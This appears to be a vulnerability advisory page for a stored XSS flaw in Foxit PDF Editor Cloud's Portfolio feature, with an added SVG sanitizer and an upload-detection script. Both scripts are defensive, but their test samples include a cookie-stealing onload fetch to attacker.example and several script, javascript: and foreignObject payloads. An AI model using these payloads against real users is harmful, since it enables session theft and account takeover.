CVE-2025-66520

6.3 MEDIUM

📋 TL;DR

A stored XSS vulnerability in the Portfolio feature of Foxit PDF Editor Cloud allows an authenticated user to upload an SVG file that embeds HTML or JavaScript. When other users open the Portfolio file list, that code executes in their browser, in the context of the Foxit cloud application. It affects all users of Foxit PDF Editor Cloud who have access to the Portfolio feature.

💻 Affected Systems

Products:
  • Foxit PDF Editor Cloud
Versions: All versions prior to the vendor's fix (the service is vendor-hosted; see Notes)
Operating Systems: All (browser-based)
Default Config Vulnerable: ⚠️ Yes
Notes: Only the cloud service at pdfonline.foxit.com is affected; desktop versions of Foxit PDF Editor are not.

📦 What is this software?

Foxit PDF Editor Cloud is the browser-hosted edition of Foxit's PDF editor, served at pdfonline.foxit.com. Its Portfolio feature lets users collect files together and presents them as a file list to other users who have access to that Portfolio; it is that file list that renders the uploaded SVG.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Attackers steal session cookies, take over accounts, redirect users to malicious sites, or perform actions on behalf of authenticated users.

🟠 Likely Case: Attackers steal session tokens or credentials, leading to unauthorized access to user accounts and the sensitive documents stored in them.

🟢 If Mitigated: With proper input validation (an allowlist sanitizer that drops script elements, event-handler attributes, javascript: links and embedded HTML) and output handling that never renders user-supplied SVG as an inline document, the malicious content is neutralized before it reaches a viewer's browser.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM
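The sanitization the "If Mitigated" row refers to, as an added example that is not Foxit's code and not from the advisory: an allowlist sanitizer for uploaded SVG, run on a constructed malicious file that carries the constructs this class of bug is exploited with (a script element, an onload handler, a javascript: link, HTML inside foreignObject, and an external use reference). The function names, the allowlist and the sample file are assumptions; it uses the standard-library parser, which should be swapped for defusedxml in production.

```python
"""Allowlist sanitizer for user-supplied SVG (example code, not Foxit's)."""
import re
import xml.etree.ElementTree as ET  # swap for defusedxml.ElementTree in production

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
XML_NS = "http://www.w3.org/XML/1998/namespace"
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

# Drawing primitives only. script, foreignObject, a, image, style, animate/set
# and anything outside the SVG namespace are dropped rather than inspected.
ALLOWED_ELEMENTS = {
    "svg", "g", "defs", "symbol", "use", "title", "desc",
    "path", "rect", "circle", "ellipse", "line", "polyline", "polygon",
    "text", "tspan", "linearGradient", "radialGradient", "stop",
    "clipPath", "mask",
}
HREF_ATTRS = {"href", "{%s}href" % XLINK_NS}   # may only point inside the document
ALLOWED_ATTR_NS = {XLINK_NS, XML_NS}           # attribute namespaces that may survive
STYLE_RE = re.compile(r"url\s*\(|expression\s*\(|@import", re.I)


def _local(name):
    """'{ns}tag' -> 'tag'; plain names pass through unchanged."""
    return name.rsplit("}", 1)[-1]


def _clean_attributes(el, findings):
    tag = _local(el.tag)
    for name, value in list(el.attrib.items()):
        attr = _local(name)
        ns = name[1:].rsplit("}", 1)[0] if name.startswith("{") else None
        if attr.lower().startswith("on"):                      # onload=, onclick=, ...
            findings.append("removed event handler %s on <%s>" % (attr, tag))
        elif name in HREF_ATTRS and not value.strip().startswith("#"):
            findings.append("removed non-fragment href on <%s>: %r" % (tag, value[:40]))
        elif attr == "style" and STYLE_RE.search(value):
            findings.append("removed style with url()/expression() on <%s>" % tag)
        elif ns is not None and ns not in ALLOWED_ATTR_NS:
            findings.append("removed foreign-namespace attribute %s on <%s>" % (attr, tag))
        else:
            continue
        del el.attrib[name]


def _walk(el, findings):
    _clean_attributes(el, findings)
    for child in list(el):                                     # list(): we mutate el
        if not child.tag.startswith("{%s}" % SVG_NS) or _local(child.tag) not in ALLOWED_ELEMENTS:
            findings.append("removed element <%s>" % _local(child.tag))
            el.remove(child)                                   # whole subtree goes with it
        else:
            _walk(child, findings)


def sanitize_svg(data):
    """Return (cleaned_svg_bytes, findings). Raises ValueError unless the input is a
    plain SVG document: no DTD or entity declarations, <svg> root in the SVG namespace."""
    if re.search(rb"<!(?:DOCTYPE|ENTITY)", data, re.I):
        raise ValueError("DTD and entity declarations are not accepted")
    root = ET.fromstring(data)
    if root.tag != "{%s}svg" % SVG_NS:
        raise ValueError("root element is not <svg>")
    findings = []
    _walk(root, findings)
    return ET.tostring(root, encoding="utf-8"), findings


# Constructed sample (assumption): every construct below is one the sanitizer must strip.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100" onload="fetch('https://attacker.example/?c=' + document.cookie)">
  <script>alert(document.domain)</script>
  <rect width="100" height="100" fill="#36c"/>
  <a xlink:href="javascript:alert(1)"><text y="50">click me</text></a>
  <foreignObject width="100" height="100">
    <body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(2)"/></body>
  </foreignObject>
  <use xlink:href="https://attacker.example/evil.svg#x"/>
</svg>"""

if __name__ == "__main__":
    cleaned, findings = sanitize_svg(MALICIOUS_SVG)
    print("\n".join(findings))
    print(cleaned.decode())
```

Rejecting any input with a DTD or entity declaration is deliberate: the sanitizer is not trying to be a full XML hardening layer. An allowlist also strips legitimate but risky elements (image, a, style, animate), which is the same trade-off the "block SVG uploads" workaround below makes in its strictest form.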

🎯 Exploit Status

Public PoC: No
Weaponized: LIKELY
Unauthenticated Exploit: No
Complexity: LOW

Exploitation requires an authenticated account that can upload files to a Portfolio, but nothing beyond that: the payload then runs in the browser of every user who views that Portfolio's file list. Since SVG is accepted as an ordinary image format by most upload flows, the bar for the attacker is low.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not stated on this page; check the vendor advisory for the fix date or build

Vendor Advisory: https://www.foxit.com/support/security-bulletins.html

Restart Required: Not applicable. The fix is deployed by Foxit on the hosted service at pdfonline.foxit.com; there is nothing for customers to install or restart.

Instructions:

1. Visit the Foxit security bulletins page.
2. Locate the advisory for CVE-2025-66520.
3. Follow the vendor's instructions for the cloud service update and confirm the fix is live (see How to Verify below).

🔧 Temporary Workarounds

Disable SVG uploads (all platforms): Block SVG file uploads to the Portfolio feature, or serve them only as downloads. This is a control on the service side; a customer of the hosted product cannot change the upload policy of pdfonline.foxit.com, so it is something to confirm with the vendor rather than apply locally.

Content Security Policy (all platforms): A strict CSP that forbids inline script blocks the payload, with one caveat a practitioner should check: a CSP on the Portfolio page only governs SVG markup inlined into that page's DOM. If the uploaded file is opened as its own document (direct navigation, iframe, object or embed), the HTTP response that delivers the SVG needs its own CSP or sandbox directive, while an SVG referenced only through an img element never runs script at all. Again, this is a response header that only the service operator can set.

🧯 If You Can't Patch

  • Stop using the Portfolio feature, or at least do not open Portfolios shared by other accounts, until the vendor confirms the fix
  • WAF rules that inspect uploads for script-bearing SVG content can only be deployed by the operator of pdfonline.foxit.com, not by a tenant; on your own side, limit who is allowed to upload to shared Portfolios

🔍 How to Verify

Check if Vulnerable:

Upload an SVG file carrying a simple JavaScript payload (e.g., <script>alert('XSS')</script> placed inside a well-formed svg root element in the SVG namespace; a bare script element is not a valid SVG and may be rejected for that reason alone, which is not evidence of a fix) to a test Portfolio, then open the file list from a second test account and check whether the script runs. Only do this against accounts and Portfolios you are authorized to test: this is a shared, vendor-hosted service, not your own instance.

Check Version:

Check application version in account settings or contact Foxit support for cloud version information.

Verify Fix Applied:

After the vendor update, repeat the test with the same SVG: the script must not run, and the stored file should come back with the script removed or be delivered in a form that cannot execute (as a download, or rendered as an image rather than as an inline document).

📡 Detection & Monitoring

Log Indicators:

  • Unusual SVG file uploads
  • Multiple failed upload attempts with script-like content
  • User sessions accessing unexpected external domains

Network Indicators:

  • Outbound connections to suspicious domains from Portfolio pages
  • Unexpected POST requests with SVG content

SIEM Query:

source="foxit-cloud" AND (file_type="svg" OR file_extension="svg") AND (content CONTAINS "<script>" OR content CONTAINS "javascript:")

Caveats: this query assumes the upload pipeline logs file content, which most telemetry does not, and its two literal, case-sensitive substrings miss an uppercase SCRIPT tag, event-handler attributes such as onload, HTML inside foreignObject, and an entity-encoded javascript: URL. Treat it as a starting point and widen the match if you do have content.
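The wider match, as an added example that is not Foxit's telemetry and not from the advisory: the detection logic run over a handful of constructed upload records. The record schema (user, file_name, content_type, content) and the indicator names are assumptions. It normalises the content (entity decoding, case, whitespace) before matching, covers the constructs the SIEM query above misses, and counts flagged uploads per user to surface the "multiple upload attempts" signal from the indicator list; naive_match reproduces what the literal query would catch so the two can be compared on the same records.

```python
"""Detection for script-bearing SVG uploads (example code, not Foxit's)."""
import html
import re

# Constructed sample upload records (assumed schema, not Foxit's telemetry).
UPLOAD_LOG = [
    {"user": "alice",   "file_name": "logo.svg",    "content_type": "image/svg+xml",
     "content": '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'},
    {"user": "mallory", "file_name": "blatant.svg", "content_type": "image/svg+xml",
     "content": '<svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.domain)</script></svg>'},
    {"user": "mallory", "file_name": "chart.svg",   "content_type": "image/svg+xml",
     "content": '<svg xmlns="http://www.w3.org/2000/svg" onload="fetch(\'https://attacker.example/?c=\'+document.cookie)"><rect/></svg>'},
    {"user": "mallory", "file_name": "icon.SVG",    "content_type": "application/octet-stream",
     "content": '<svg xmlns="http://www.w3.org/2000/svg"><SCRIPT>alert(1)</SCRIPT></svg>'},
    {"user": "mallory", "file_name": "link.svg",    "content_type": "image/svg+xml",
     "content": '<svg xmlns="http://www.w3.org/2000/svg"><a href="&#x6a;avascript:alert(1)"><text>x</text></a></svg>'},
    {"user": "bob",     "file_name": "report.pdf",  "content_type": "application/pdf",
     "content": "%PDF-1.7 ... <script> appears in a PDF comment, not an SVG"},
]

NAIVE_PATTERNS = ("<script>", "javascript:")   # what the SIEM query above matches

# Constructs that make an SVG run script when it is rendered as a document.
INDICATORS = {
    "script element":                re.compile(r"<\s*script\b", re.I),
    "event handler attribute":       re.compile(r"\son[a-z]+\s*=", re.I),
    "javascript: URL":               re.compile(r"javascript\s*:", re.I),
    "foreignObject (embedded HTML)": re.compile(r"<\s*foreignObject\b", re.I),
    "external href":                 re.compile(r"href\s*=\s*[\"']\s*(?:https?:|data:)", re.I),
    "DTD / entity declaration":      re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.I),
}


def normalise(content):
    """Decode entity-encoded payloads (&#x6a;avascript:) and collapse whitespace."""
    return re.sub(r"\s+", " ", html.unescape(content))


def is_svg_upload(record):
    name = record.get("file_name", "").lower()
    return name.endswith((".svg", ".svgz")) or "svg" in record.get("content_type", "").lower()


def naive_match(record):
    """The literal, case-sensitive check the SIEM query performs."""
    return is_svg_upload(record) and any(p in record["content"] for p in NAIVE_PATTERNS)


def classify(record):
    """Return the indicator names found in an SVG upload record (empty if none)."""
    if not is_svg_upload(record):
        return []
    body = normalise(record.get("content", ""))
    return [label for label, rx in INDICATORS.items() if rx.search(body)]


def triage(log):
    """Flagged uploads as (user, file_name, indicators), plus the flagged count per user:
    repeat offenders are the 'multiple upload attempts' signal from the indicator list."""
    flagged = [(r["user"], r["file_name"], classify(r)) for r in log if classify(r)]
    per_user = {}
    for user, _, _ in flagged:
        per_user[user] = per_user.get(user, 0) + 1
    return flagged, per_user


if __name__ == "__main__":
    for rec in UPLOAD_LOG:
        print(rec["file_name"], "naive:", naive_match(rec), "indicators:", classify(rec))
    print(triage(UPLOAD_LOG)[1])
```

On the constructed records the literal query catches only blatant.svg, while the normalised check flags all four of mallory's uploads; the decoded-entity and uppercase cases are exactly the evasions a literal CONTAINS clause cannot see.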
